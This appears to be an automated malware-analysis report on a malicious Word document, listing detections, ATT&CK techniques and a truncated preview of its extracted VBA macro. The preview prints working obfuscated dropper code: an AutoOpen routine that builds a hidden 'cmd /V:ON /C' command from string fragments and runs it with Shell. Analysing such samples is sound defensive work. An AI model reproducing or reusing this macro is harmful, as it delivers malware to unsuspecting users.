MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening. The macro attempts to execute a command using the Shell function, indicating it's likely a downloader or dropper for a second-stage payload. The presence of the AutoOpen macro and the critical ClamAV detection strongly suggest malicious intent.
Heuristics 5
-
ClamAV: Doc.Malware.Generic-6666973-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6666973-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12762 bytes |
SHA-256: c4e9bd6a3c9933d80d57061c39aeed6fe5a842967e01ced1a8f2af9b21adcd09 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "VXzoOtZVpkqYRd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Sgn(211519271)
TypeName 95
TypeName dwcBFA
TypeName Atn(PRhtji - pzwJz * 87460 - zFlLNk)
TypeName PrhbH
Shell@ KeyString(vbKeyC) + JQjiYpwTYJh + wADEWZn + qkocjRXozk + SrLJcKU + jqfOKroKkj + UVMStnSwnuS + cXoQHhaw + XfuLUTYcN + qjOpKzfk + khOUbITmDB + SwAEVG + hNfIrziVNvNEYQ + SRmwQuwFmolR, 748164825 - 748164825
TypeName Oct(7415 + wBbjOc)
TypeName Hex(820)
End Sub
Attribute VB_Name = "HqzoUYE"
Function qkocjRXozk()
On Error Resume Next
TypeName 8
TypeName 5
TypeName CBool(uUwTP / BCNfj + IjllC * Jtdss)
pMjuPE = "md" + " /" + "V" + ":" + "ON" + "/" + "C" + CStr(Chr(HkvQaIqZq + jJuaHnM + 34 + OkbwZzio + optdlER)) + "s"
TypeName 952
TypeName 177591525
iDYaVqOhNV = "e" + "t #" + " " + " =" + "wjt" + "h" + "MMi" + "M"
TypeName Sqr(115314270)
TypeName Sqr(ciqCu)
jtChbj = "Ur" + "v" + "GUs" + "Cvw" + "HW" + "NTV" + "r" + "p=" + "/" + "xo" + "au-" + "b"
TypeName TFrDZY
TypeName Log(2157)
TypeName 72
YPNfmVUj = "lS9" + "P:)" + "(7" + "n" + "6y}"
TypeName 255
TypeName Atn(9305)
TypeName Rnd(MmikC)
sGYKrBwj = "B;e" + "Fz3" + "1," + "d" + "{Xk"
TypeName CLng(NEQiD)
TypeName Cos(86757 / Coilz)
TypeName Hex(81161 - mpTMsw / GsKWE * KZtrF)
ItdcqrhcmO = "gc" + "Y$D" + "m" + " '\" + "IKf"
TypeName qwOUw
TypeName CSng(MRbjP)
TypeName Oct(NIwAIq)
IMqDsNdUS = ".q" + "@E" + "+" + "R&" + "&fo" + "r " + "%p" + " in" + " ("
TypeName CBool(96112 - ZWZXr + 56737 / CMPwwB)
TypeName blzDiW
UsqaiVMp = "2" + "3," + "2" + "7,1" + "6," + "46," + "22," + "13" + ",3," + "4" + "6" + ",3"
TypeName Atn(67)
TypeName CStr(MktFL)
TypeName Rnd(8)
BKfcBXj = "2" + ",32" + ",62" + ",59" + ",2" + "3," + "6" + "6,4" + "8,2" + "4,4"
TypeName 7
TypeName 77
TypeName 17
tBfKuqqDVpC = "0," + "46" + "," + "16," + "3" + "0,2"
TypeName Chr(pRVWF / SpiZiZ)
TypeName TFQzX
TypeName mzsLz
zrCEtPV = "7" + ",31" + ",1" + ",4" + "6,5" + "7"
TypeName 54
TypeName Sqr(qjLKrw - jEkAnW - 38042 - iGwQl)
TypeName CSng(36877 - ADhIXl / 45669 + ZJapLv)
psNkbziiCi = "," + "2," + "62" + "," + "1" + "9" + ",46" + ",2," + "6" + "8" + ",18" + "," + "4"
TypeName CLng(VuYDvS + 48933 + FCXNT + MSJnO)
TypeName 66
TypeName CSng(460072517)
PnfWlL = "6," + "3" + "1," + "14" + "," + "3" + "2" + ",6" + ","
qkocjRXozk = pMjuPE + iDYaVqOhNV + jtChbj + YPNfmVUj + sGYKrBwj + ItdcqrhcmO + IMqDsNdUS + UsqaiVMp + BKfcBXj + tBfKuqqDVpC + zrCEtPV + psNkbziiCi + PnfWlL
TypeName Cos(19996 / tmOFZ * zIPjN - UNMpLc)
TypeName Rnd(PNNti)
TypeName 423450039
End Function
Function SrLJcKU()
On Error Resume Next
TypeName CStr(pChJp)
TypeName 1059
TypeName qmusd
vznVCcFb = "46," + "40," + "2," + "45," + "59," + "21," + "71"
TypeName Rnd(78)
TypeName Round(18040 * zMfzwu)
TypeName 9
HQuHjnR = ",67" + ",24" + ",6" + "3," + "3" + ",2," + "2," + "23" + ","
TypeName Round(971)
TypeName Sin(iGiYL / VYDrKH / 51611 - sblcjm)
ljZzjDHRc = "3" + "6,2" + "5,2" + "5" + ",28" + "," + "61"
TypeName Sqr(64405 / FfGwoF)
TypeName Round(ZTISvQ + HoJrkI)
JfrXu = ",46" + ",5" + "2,6" + ",27" + ",4"
TypeName APSOm
TypeName Rnd(201076278)
TypeName 525
JmKwkvO = "0," + "6" + "8" + ",4" + "0," + "4" + "6,2" + ",25" + ",29" + ",1" + "9"
TypeName Chr(117133175)
TypeName CByte(siCdmB / SRzIT + 28011 / sjFvsE)
NBHoJQOXV = "," + "7" + "," + "12" + "," + "49," + "34," + "44"
TypeName Cos(59)
TypeName cPaoa
wDAGGP = ",70" + "," + "3" + ",2," + "2," + "23" + ",3" + "6" + ",25"
TypeName 202309463
TypeName Sqr(YpNCC)
TypeName 1
jLcazYaNlpm = "," + "25," + "3" + "1" + "," + "6,5" + "7,"
TypeName kZjddf
TypeName CLng(KwzmUa)
TypeName CDbl(XbOsu)
RtUVbJWOdT = "6," + "57" + "," + "29," + "32,"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.